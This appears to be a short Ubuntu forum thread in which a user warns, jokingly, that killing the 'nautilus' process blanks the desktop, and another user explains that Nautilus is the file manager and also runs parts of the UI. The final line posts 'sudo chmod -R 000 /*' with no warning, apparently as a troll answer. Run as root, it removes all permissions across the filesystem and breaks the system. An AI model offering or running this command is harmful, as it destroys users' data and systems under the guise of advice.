Dear Ubuntu users...

Dont go in system monitor and kill the process 'nautilus' as it will get rid of your desktop and leave you with a blank screen at your desktop :)

Source: personal experience from 2 minuets ago

fix: restart/reboot

cause: being an idiot and thinking that was Ubuntu file explorer

if anyone wants an image ill post one :P

although i dun wanna risk it incase it will go bs and destroy my pc xD

Nautilus IS ubuntu's file manager, but like explorer in windows it also takes care of parts of the ui

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
